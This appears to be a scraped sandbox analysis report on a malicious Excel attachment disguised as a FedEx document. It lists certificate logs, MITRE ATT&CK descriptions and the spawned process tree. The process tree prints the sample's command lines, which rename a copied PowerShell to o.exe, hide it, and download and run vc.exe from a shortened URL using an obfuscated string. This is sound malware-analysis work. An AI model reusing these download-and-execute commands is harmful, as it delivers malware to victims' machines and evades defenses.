Nov 19, 2020 09:20:04.412228107 CET	104.20.138.65	443	192.168.2.22	49167	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Aug 03 02:00:00 CEST 2020 Mon Jan 27 13:46:39 CET 2020	Tue Aug 03 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Nov 19, 2020 09:20:04.412228107 CET	104.20.138.65	443	192.168.2.22	49167	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:46:39 CET 2020	Wed Jan 01 00:59:59 CET 2025		05af1f5ca1b87cc9cc9b25185115607d
Nov 19, 2020 09:20:05.551822901 CET	162.159.134.233	443	192.168.2.22	49168	CN=ssl711319.cloudflaressl.com CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004	Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Sep 25 02:00:00 CEST 2014	Tue Sep 25 01:59:59 CEST 2029
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1960 Parent PID: 584

General

Start time:	09:19:47
Start date:	19/11/2020
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fb70000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 2536 Parent PID: 1960

General

Start time:	09:19:49
Start date:	19/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Imagebase:	0x49eb0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 2504 Parent PID: 1960

General

Start time:	09:19:50
Start date:	19/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Imagebase:	0x49eb0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 2832 Parent PID: 1960

General

Start time:	09:19:50
Start date:	19/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Imagebase:	0x49eb0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: Robocopy.exe PID: 2712 Parent PID: 2536

General

Start time:	09:19:50
Start date:	19/11/2020
Path:	C:\Windows\System32\Robocopy.exe
Wow64 process (32bit):	false
Commandline:	robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Imagebase:	0xff7b0000
File size:	128000 bytes
MD5 hash:	0A551CCDEF9D6F99A008B5B075354650
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: timeout.exe PID: 2896 Parent PID: 2504

General

Start time:	09:19:50
Start date:	19/11/2020
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 1
Imagebase:	0xffca0000
File size:	33280 bytes
MD5 hash:	68A0A50CCAD87E1EE1944410A96D066C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 2904 Parent PID: 1960

General

Start time:	09:19:53
Start date:	19/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Imagebase:	0x4a360000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 824 Parent PID: 1960

General

Start time:	09:19:54
Start date:	19/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Imagebase:	0x4a360000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 3048 Parent PID: 1960

General

Start time:	09:19:54
Start date:	19/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Imagebase:	0x4a360000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: o.exe PID: 2848 Parent PID: 2904

General

Start time:	09:19:54
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Local\Temp\o.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Imagebase:	0x13fb80000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: o.exe PID: 2780 Parent PID: 824

General

Start time:	09:19:54
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Local\Temp\o.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Imagebase:	0x13fb80000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: o.exe PID: 1976 Parent PID: 3048

General

Start time:	09:19:55
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Local\Temp\o.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Imagebase:	0x13fb80000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: vc.exe PID: 1192 Parent PID: 1976

General

Start time:	09:20:10
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Roaming\vc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vc.exe
Imagebase:	0xfd0000
File size:	160312 bytes
MD5 hash:	BB7C0DFD8ECC7EEBCE937A232608695F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1099008FEDEX_090887766.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "1099008FEDEX_090887766.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 65416

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre